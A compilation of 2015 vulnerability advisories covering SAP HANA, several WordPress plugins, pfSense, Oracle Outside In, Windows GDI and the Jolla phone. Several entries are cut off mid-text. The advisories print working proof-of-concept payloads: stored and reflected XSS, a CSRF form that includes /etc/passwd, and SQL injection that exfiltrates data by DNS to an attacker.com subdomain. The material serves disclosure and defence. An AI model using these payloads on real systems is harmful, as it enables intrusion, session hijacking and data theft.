The vulnerable application is “grant.xsfunc”, located under:

/testApps/grantAccess/grant.xscfunc

6. Solution
===

Implement SAP Security Note 2109818


7. Report Timeline
==

2014-10-03: Onapsis provides vulnerability information to SAP AG.
2014-11-07: Onapsis provides additional information about the
vulnerability to SAP AG.
2015-01-26: Onapsis provides additional information about the
vulnerability to SAP AG.
2015-02-10: SAP AG publishes security note 2109818 which fixes the problem.
2015-05-27: Onapsis publishes security advisory.

Organizations depend on Onapsis because of our ability to provide
reliable expertise and solutions for securing business essentials.


About Onapsis Research Labs
===

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.




[Onapsis Security Advisory 2015-006] SAP HANA Information Disclosure via SQL IMPORT FROM statement

2015-05-27 Thread Onapsis Research Labs
Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA Information
Disclosure via SQL IMPORT FROM statement


1. Impact on Business
=

Under certain conditions some SAP HANA database commands could be
abused by a remote authenticated attacker to access restricted
information. This could be used to gain access to confidential
information.

Risk Level: Medium


2. Advisory Information
===

- Public Release Date: 2015-05-27
- Subscriber Notification Date: 2015-05-27
- Last Revised: 2015-05-27
- Security Advisory ID: ONAPSIS-2015-006
- Onapsis SVS ID: ONAPSIS-00142
- CVE: CVE-2015-3995
- Researcher: Sergio Abraham, Fernando Russ, Nahuel D. Sánchez
- Initial Base CVSS v2:  4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)


3. Vulnerability Information


- Vendor:  SAP A.G.
- Affected Components: SAP HANA DB 1.00.73.00.389160 (NewDB100_REL)
- Vulnerability Class: Improper Access Control (CWE-284)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory:
http://www.onapsis.com/research/security-advisories/SAP-HANA-information-disclosure-via-SQL-import-from-statement



4. Affected Components Description
==

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details


A remote authenticated attacker could access confidential information
using a specially crafted SQL statement, which lets them read arbitrary
files from the OS through the READ FILE IMPORT database command, which
can be performed inside any SQL query.


6. Solution
===

Implement SAP Security Note 2109565


7. Report Timeline
==

2014-10-18: Onapsis provides vulnerability information to SAP AG.
2014-10-19: SAP AG confirms having the information about the
vulnerability.
2015-01-13: SAP AG publishes security note 2109565 which fixes the
problem.
2015-05-27: Onapsis publishes security advisory.


About Onapsis Research Labs
===

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth
knowledge and experience to deliver technical and business-context
with sound security judgment to the broader information security
community.



Stored XSS in WP Photo Album Plus WordPress Plugin

2015-05-20 Thread High-Tech Bridge Security Research
Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication:  April 29, 2015  [without technical details]
Vendor Notification: April 29, 2015 
Vendor Patch: April 29, 2015 
Public Disclosure: May 20, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a stored XSS vulnerability in 
the WP Photo Album Plus WordPress plugin, which can be exploited to perform 
Cross-Site Scripting attacks against administrators of a vulnerable WordPress 
installation. An attacker might be able to hijack the administrator's session 
and obtain full control over the vulnerable website.

The vulnerability exists due to the absence of filtration of user-supplied 
input passed via the 'comname' and 'comemail' HTTP POST parameters to the 
/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php script when 
posting a comment. 

A remote attacker can post a specially crafted comment containing malicious 
HTML or script code and execute it in the administrator's browser, in the 
context of the vulnerable website, when the administrator views images or 
comments in the administrative interface. 

The simple exploit below stores JS code in the WP database and displays a JS 
popup window with the word ImmuniWeb every time the administrator views 
comments or images:


<form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main">
<input type="hidden" name="action" value='wppa'>
<input type="hidden" name="wppa-action" value='do-comment'>
<input type="hidden" name="photo-id" value='2'>
<input type="hidden" name="comment" value='1'>
<input type="hidden" name="moccur" value='1'>
<input type="hidden" name="comemail" value='<script>alert(/ImmuniWeb/);</script>'>
<input type="hidden" name="comname" value='<script>alert(/ImmuniWeb/);</script>'>
<input type="submit" id="btn">
</form>


The code will be executed automatically when the administrator visits one of 
the following pages:

http://[host]/wp-admin/admin.php?page=wppa_manage_comments
http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

---

Solution:

Update to WP Photo Album Plus 6.1.3

More Information:
https://wordpress.org/plugins/wp-photo-album-plus/changelog/

---

References:

[1] High-Tech Bridge Advisory HTB23257 - 
https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) 
in WP Photo Album Plus WordPress Plugin.
[2] WP Photo Album Plus WordPress plugin - 
https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to 
easily manage and display your photos, photo albums, slideshows and videos in a 
single as well as in a network WP site.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Arbitrary Variable Overwrite in eShop WordPress Plugin

2015-05-06 Thread High-Tech Bridge Security Research
Advisory ID: HTB23255
Product: eShop WordPress plugin
Vendor: Rich Pedley 
Vulnerable Version(s): 6.3.11 and probably prior
Tested Version: 6.3.11
Advisory Publication:  April 15, 2015  [without technical details]
Vendor Notification: April 15, 2015 
Public Disclosure: May 6, 2015 
Vulnerability Type: Code Injection [CWE-94]
CVE Reference: CVE-2015-3421
Risk Level: Medium 
CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a security vulnerability in 
the eShop WordPress plugin, which can be exploited by a remote attacker to 
overwrite arbitrary PHP variables within the context of the vulnerable 
application. The vulnerability exists due to insufficient validation of 
user-supplied input in the 'eshopcart' HTTP cookie. Successful exploitation of 
this vulnerability may potentially result in arbitrary PHP code execution (RCE).
 
Often such vulnerabilities lead to RCE; however, in this case we can only 
overwrite string variables within the scope of the 'eshop_checkout()' function 
in the '/wp-content/plugins/eshop/checkout.php' file. This reduces the 
available exploitation vectors to Full Path Disclosure and Cross-Site Scripting. 

Below is a simple PoC that overwrites the contents of the 'wpdb' PHP variable, 
which causes an error in the code and discloses the full installation path:


GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=wpdb%3d1%7C; 


Another PoC triggers the XSS vector and shows a JS pop-up box displaying 
ImmuniWeb:


GET /shopping-cart-2/checkout/ HTTP/1.1
Cookie: eshopcart=phone%3dsdfg'<script>alert(/ImmuniWeb/)</script>



---

Solution:

Disclosure timeline:
2015-04-15 Vendor Alerted via contact form and thread in support forum, no 
reply.
2015-04-29 Vendor Alerted via contact form and emails, no reply.
2015-05-05 Fix Requested via contact form and emails, no reply.
2015-05-06 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

---

References:

[1] High-Tech Bridge Advisory HTB23255 - 
https://www.htbridge.com/advisory/HTB23255 - Arbitrary Variable Overwrite in 
eShop WordPress Plugin.
[2] eShop WordPress Plugin - http://quirm.net/ - eShop is an accessible 
shopping cart plugin for WordPress, packed with various features.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Multiple Vulnerabilities in TheCartPress WordPress plugin

2015-04-29 Thread High-Tech Bridge Security Research
Advisory ID: HTB23254
Product: TheCartPress WordPress plugin
Vendor: TheCartPress team
Vulnerable Version(s): 1.3.9 and probably prior
Tested Version: 1.3.9
Advisory Publication:  April 8, 2015  [without technical details]
Vendor Notification: April 8, 2015 
Public Disclosure: April 29, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], 
Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284]
CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302
Risk Level: High 
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 
(AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 
(AV:N/AC:M/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP 
code, disclose sensitive data, and perform Cross-Site Scripting attacks against 
users of WordPress installations with the vulnerable plugin.

1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301

Input passed via the tcp_box_path HTTP POST parameter to the 
/wp-admin/admin.php?page=checkout_editor_settings URL is not properly 
verified before being used in the PHP 'include()' function, and can be abused 
to include arbitrary local files via directory traversal sequences.

In order to successfully exploit the vulnerability an attacker needs to have 
administrator privileges on the WordPress installation; however, it can also be 
exploited via a CSRF vector, to which the script is vulnerable as well. 

The simple CSRF exploit below will execute the content of the '/etc/passwd' 
file when a logged-in administrator visits a page containing it:

<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main">
<input type="hidden" name="tcp_save_fields" value='1'>
<input type="hidden" name="tcp_box_path" value='../../../../../etc/passwd'>
<input type="submit" id="btn">
</form>
<script>
 document.main.submit();
</script>



2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300

During the checkout process, many user-supplied HTTP POST parameters (see the 
complete list in the PoC) in the Shipping address and Billing address sections 
are not sanitized before being stored in the local database. 

The simple mass-XSS PoC below against the Billing address section (the PoC 
against the Shipping address section is identical; just replace the 'billing_' 
prefix with 'shipping_') will write several JS pop-up alerts into the 
application database:

<form action="http://wordpress/shopping-cart/checkout/" method="post" name="main">
<input type="hidden" name="selected_billing_id" value='1'>
<input type="hidden" name="selected_billing_address" value='new'>
<input type="hidden" name="billing_firstname" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_lastname" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_company" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_tax_id_number" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_country_id" value='AF'>
<input type="hidden" name="billing_region_id" value=''>
<input type="hidden" name="billing_region" value=''>
<input type="hidden" name="billing_city" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_street_2" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_postcode" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_1" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_2" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_fax" value='<script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_email" value='m...@mail.com'>
<input type="hidden" name="tcp_continue" value=''>
<input type="hidden" name="tcp_step" value='1'>
<input type="submit" id="btn">
</form>


A non-authenticated attacker may inject malicious HTML and JS code that will be 
stored in the application database and served to any non-authenticated user at 
the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

It is also served at the following URL, which is accessible to the WordPress 
administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php


3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to a broken 
authentication mechanism. To reproduce the vulnerability an attacker shall 
first open the following URL:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

and immediately afterwards open the following URL to see the full order details:
http://wordpress/wp

Secunia Research: Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability

2015-04-16 Thread Secunia Research
== 
 
Secunia Research 16/04/2015  

   Oracle Outside In ibpsd2.dll PSD File Processing
   Buffer Overflow Vulnerability

== 
Table of Contents

Affected Software ............................ 1
Severity ..................................... 2
Description of Vulnerability ................. 3
Solution ..................................... 4
Time Table ................................... 5
Credits ...................................... 6
References ................................... 7
About Secunia ................................ 8
Verification ................................. 9

== 
1) Affected Software


* Oracle Outside In versions 8.4.1, 8.5.0, and 8.5.1

== 
2) Severity 

Rating: Moderately critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused by a sign extension error in ibpsd2.dll when
processing PSD files, which can be exploited to cause a heap-based buffer
overflow.

Successful exploitation of the vulnerability may allow execution of
arbitrary code.

== 
4) Solution 

Apply update. Please see the Oracle Critical Patch Update Advisory for
April 2015 for details.

== 
5) Time Table

11/02/2015 - Vendor notified.
11/02/2015 - Vendor response.
12/02/2015 - Vendor supplied bug ticket ID.
24/02/2015 - Vendor supplied information of fix in main codeline.
13/03/2015 - Vendor requested delay of disclosure.
16/03/2015 - Replied to vendor and requested a new estimated date.
16/03/2015 - Vendor replied that estimated date will be investigated.
19/03/2015 - Vendor supplied 14/07/2015 as estimated fix date.
24/03/2015 - Vendor supplied status report.
10/04/2015 - Vendor supplied 14/04/2015 as estimated fix date.
14/04/2015 - Release of vendor patch.
15/04/2015 - Public disclosure.

== 
6) Credits 

Discovered by Dmitry Janushkevich, Secunia Research.

== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-0493 identifier for the vulnerability.
 
== 
8) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-2/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==  


Secunia Research: Microsoft Windows GDI MRSETDIBITSTODEVICE ::bPlay() EMF Parsing Memory Corruption Vulnerability

2015-04-15 Thread Secunia Research
== 
 
Secunia Research 15/04/2015  

  Microsoft Windows GDI MRSETDIBITSTODEVICE ::bPlay() EMF Parsing
  Memory Corruption Vulnerability

== 
Table of Contents

Affected Software ............................ 1
Severity ..................................... 2
Description of Vulnerability ................. 3
Solution ..................................... 4
Time Table ................................... 5
Credits ...................................... 6
References ................................... 7
About Secunia ................................ 8
Verification ................................. 9

== 
1) Affected Software


* Microsoft Windows 7
* Microsoft Windows Server 2003 Datacenter Edition
* Microsoft Windows Server 2003 Enterprise Edition
* Microsoft Windows Server 2003 Standard Edition
* Microsoft Windows Server 2003 Web Edition
* Microsoft Windows Storage Server 2003
* Microsoft Windows Server 2008
* Microsoft Windows Vista

== 
2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an error within the
MRSETDIBITSTODEVICE::bPlay() function (GDI32.dll) and can be
exploited to cause memory corruption via an EMF file with a
specially crafted EMR_SETDIBITSTODEVICE record.

Successful exploitation allows execution of arbitrary code.

== 
4) Solution 

Apply update provided by MS15-035.

== 
5) Time Table

14/01/2015 - Vendor notified.
15/01/2015 - Vendor response.
15/01/2015 - Vendor requests delay of disclosure.
15/01/2015 - Replied to vendor requesting planned date of update.
16/02/2015 - Requested status update.
20/02/2015 - Vendor response with no timeline.
23/02/2015 - Replied to vendor requesting future status updates.
26/03/2015 - Requested status update and planned date of update.
08/04/2015 - Vendor response with expected release on 14/04/2015.
11/04/2015 - Replied to vendor.
14/04/2015 - Release of vendor patch and public disclosure.

== 
6) Credits 

Discovered by Hossein Lotfi, Secunia Research.

== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-1645 identifier for the vulnerability.
 
== 
8) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-1/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==  


Arbitrary file deletion and multiple XSS vulnerabilities in pfSense

2015-03-25 Thread High-Tech Bridge Security Research
Advisory ID: HTB23251
Product: pfSense
Vendor: Electric Sheep Fencing LLC 
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Advisory Publication:  March 4, 2015  [without technical details]
Vendor Notification: March 4, 2015 
Vendor Patch: March 5, 2015 
Public Disclosure: March 25, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery 
[CWE-352]
CVE References: CVE-2015-2294, CVE-2015-2295
Risk Level: Medium 
CVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 5.4 
(AV:N/AC:H/Au:N/C:N/I:N/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
the web interface of pfSense, which can be exploited to perform Cross-Site 
Scripting (XSS) attacks against the pfSense administrator and to delete 
arbitrary files via CSRF (Cross-Site Request Forgery) attacks.

Successful exploitation of the vulnerabilities may allow an attacker to delete 
arbitrary files on the system with root privileges, steal the administrator's 
cookies and gain complete control over the web application and even the entire 
system, as pfSense runs with root privileges and allows OS command execution 
via its web interface.


1) Multiple XSS vulnerabilities in pfSense: CVE-2015-2294

1.1 Input passed via the zone HTTP GET parameter to the 
/status_captiveportal.php script is not properly sanitised before being 
returned to the user. A remote attacker can trick a logged-in administrator 
into opening a specially crafted link and execute arbitrary HTML and script 
code in the browser in the context of the vulnerable website.

The PoC code below uses the JS alert() function to display an ImmuniWeb popup:

https://[host]/status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.2 Input passed via the if and dragtable HTTP GET parameters to the 
/firewall_rules.php script is not properly sanitised before being returned to 
the user. A remote attacker can trick a logged-in administrator into opening a 
specially crafted link and execute arbitrary HTML and script code in the 
browser in the context of the vulnerable website.

Below are two PoC codes, one for each vulnerable parameter, that use the JS 
alert() function to display an ImmuniWeb popup:

https://[host]/firewall_rules.php?undodrag=1&dragtable=&if=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

https://[host]/firewall_rules.php?if=wan&undodrag=1&dragtable%5B%5D=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.3 Input passed via the queue HTTP GET parameter to the /firewall_shaper.php 
script is not properly sanitised before being returned to the user. A remote 
attacker can trick a logged-in administrator into opening a specially crafted 
link and execute arbitrary HTML and script code in the browser in the context 
of the vulnerable website.

The PoC code below uses the JS alert() function to display an ImmuniWeb popup:

https://[host]/firewall_shaper.php?interface=wan&action=add&queue=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.4 Input passed via the id HTTP GET parameter to the 
/services_unbound_acls.php script is not properly sanitised before being 
returned to the user. A remote attacker can trick a logged-in administrator 
into opening a specially crafted link and execute arbitrary HTML and script 
code in the browser in the context of the vulnerable website.

The PoC code below uses the JS alert() function to display an ImmuniWeb popup:

https://[host]/services_unbound_acls.php?act=edit&id=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.5 Input passed via the filterlogentries_time, 
filterlogentries_sourceipaddress, filterlogentries_sourceport, 
filterlogentries_destinationipaddress, filterlogentries_interfaces, 
filterlogentries_destinationport, filterlogentries_protocolflags and 
filterlogentries_qty HTTP GET parameters to the /diag_logs_filter.php script 
is not properly sanitised before being returned to the user. A remote attacker 
can trick a logged-in administrator into opening a specially crafted link and 
execute arbitrary HTML and script code in the browser in the context of the 
vulnerable website.

Below are eight PoC codes, one for each vulnerable parameter, that use the JS 
alert() function to display an ImmuniWeb popup:

https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert

Jolla Phone tel URI Spoofing

2015-03-13 Thread NSO Research

-- NSOADV-2015-001 ---

 Jolla Phone tel URI Spoofing

  Title:  Jolla Phone tel URI Spoofing
  Severity:   Low
  Advisory ID:NSOADV-2015-001
  Date Reported:  2015-01-29
  Release Date:   2015-03-13
  Author: Nikolas Sotiriu
  Website:http://sotiriu.de
  Twitter:http://twitter.com/nsoresearch
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2015-001.txt
  Vendor: Jolla (https://www.jolla.com/)
  Affected Products:  Jolla Phone
  Affected Versions:  <= Sailfish OS 1.1.1.27 (Vaarainjärvi)
  Remote Exploitable: Yes
  Patch Status:   Vendor released a patch (See Solution)
  Discovered by:  Nikolas Sotiriu



Description:


The Sailfish OS of the Jolla Phone contains a vulnerability that allows the
phone number passed by a tel URI through an A HREF on a website to be
spoofed by inserting spaces (HTML &#32;) into it.

This could be used to trick a victim into dialling a premium-rate telephone
number, for example.



Proof of Concept:
=

<a href="tel:00[25xSpaces]Spoofed Text[38Spaces]">Call</a>

Test Site http://sotiriu.de/demos/callspoof.html
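The spoof works because the href carries spaces and free text among the digits, so what the call prompt shows need not be what is dialled. The following is an added example (not code from the NSO advisory or from Jolla) of a dialer-side check that accepts only well-formed RFC 3966 numbers and dials the normalized digit string it displayed; the sample hrefs are constructed to match the PoC shape.

```python
"""Reject tel: hrefs that can show one thing and dial another.

Added example; not code from the NSO advisory or from Jolla. A dialer that
accepts only RFC 3966 numbers (optional leading '+', digits, and the visual
separators '-', '.', '(', ')') and prompts with the normalized digit string
has no gap between what is shown and what is dialled.
"""
import re
from urllib.parse import unquote

VISUAL_SEPARATORS = "-.()"
# RFC 3966 number syntax without parameters: '+' only as first character,
# then digits and visual separators. Whitespace and letters are not allowed.
_NUMBER_RE = re.compile(r"^\+?[0-9\-.()]+$")


class TelUriError(ValueError):
    """The href is not a tel: URI a dialer should act on."""


def normalize_tel_uri(href: str) -> str:
    """Return the digit string a dialer should show and dial for `href`.

    Percent-decoding is applied first because the browser decodes %20 before
    handing the URI to the phone app; validating the raw href would let an
    encoded space through.
    """
    decoded = unquote(href.strip())
    if decoded[:4].lower() != "tel:":
        raise TelUriError("not a tel: URI")
    number = decoded[4:]
    if ";" in number:
        # ';phone-context=' and other parameters are out of scope here:
        # refuse rather than dial something the user was not shown.
        raise TelUriError("tel URI parameters are not supported")
    if not _NUMBER_RE.match(number):
        bad = sorted({c for c in number
                      if c not in "+0123456789" + VISUAL_SEPARATORS})
        raise TelUriError(f"malformed number, disallowed characters: {bad!r}")
    # Visual separators are display-only; the dialled string is digits only.
    return "".join(c for c in number if c not in VISUAL_SEPARATORS)


def is_safe_tel_uri(href: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        normalize_tel_uri(href)
        return True
    except TelUriError:
        return False


# Constructed inputs shaped like the advisory's PoC: "00", a run of spaces,
# free text, another run of spaces. The real PoC uses 25 and 38 spaces.
SPOOFED_HREF = "tel:00" + " " * 25 + "Spoofed Text" + " " * 38
ENCODED_SPOOF = "tel:00%20Spoofed%20Text"   # same trick with %20 instead of raw spaces
CLEAN_HREF = "tel:+1-555-0100"               # constructed, well-formed number

if __name__ == "__main__":
    for href in (CLEAN_HREF, SPOOFED_HREF, ENCODED_SPOOF):
        try:
            print(f"{href[:24]!r:28} -> dial {normalize_tel_uri(href)}")
        except TelUriError as exc:
            print(f"{href[:24]!r:28} -> rejected: {exc}")
```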



Solution:
=

Install Version 1.1.2.16 (Yliaavanlampi)

https://together.jolla.com/question/82037/release-notes-upgrade-112-
yliaavanlampi-early-access/



Disclosure Timeline:


2015-01-28: Asked for a PGP Key (secur...@jolla.com)
2015-01-29: Got the PGP Key
2015-01-29: Sent vulnerability information to vendor
2015-01-29: Feedback that the vendor is looking into the problem
2015-01-30: Got detailed information about the patch process and
timeline
2015-02-19: Got an E-Mail that the patched version is released
2015-03-13: Release of this advisory







SQL Injection in Huge IT Slider WordPress Plugin

2015-03-12 Thread High-Tech Bridge Security Research
Advisory ID: HTB23250
Product: Huge IT Slider WordPress Plugin
Vendor: Huge-IT
Vulnerable Version(s): 2.6.8 and probably prior
Tested Version: 2.6.8
Advisory Publication:  February 19, 2015  [without technical details]
Vendor Notification: February 19, 2015 
Vendor Patch: March 11, 2015 
Public Disclosure: March 12, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-2062
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection 
vulnerability in Huge IT Slider WordPress Plugin. This vulnerability can be 
exploited by website administrators as well as anonymous attackers to inject 
and execute arbitrary SQL queries within the application’s database. 


1) SQL injection in Huge IT Slider WordPress plugin: CVE-2015-2062

The vulnerability exists due to insufficient filtering of input data passed 
via the removeslide HTTP GET parameter to the /wp-admin/admin.php script when 
the task parameter is set to popup_posts or edit_cat. A remote authenticated 
attacker with administrative privileges can execute arbitrary SQL queries 
within the application's database.

Below are two simple exploit codes based on the DNS exfiltration technique. 
They can be used if the database of the vulnerable application is hosted on a 
Windows system. The codes make the database server send a DNS request 
resolving a subdomain of .attacker.com (a domain whose DNS server is 
controlled by the attacker), where the subdomain label is the output of 
`version()` (or any other sensitive output from the database).

1. Exploit example for task=popup_posts: 
http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 --

2. Exploit example for task=edit_cat: 
http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=edit_cat&id=1&removeslide=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 --

This vulnerability can also be exploited remotely by non-authenticated 
attackers using a CSRF vector, since the web application is also prone to 
Cross-Site Request Forgery attacks. The attacker could use the following 
exploit code against an authenticated website administrator to determine the 
version of the installed MySQL server:

<img 
src="http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select
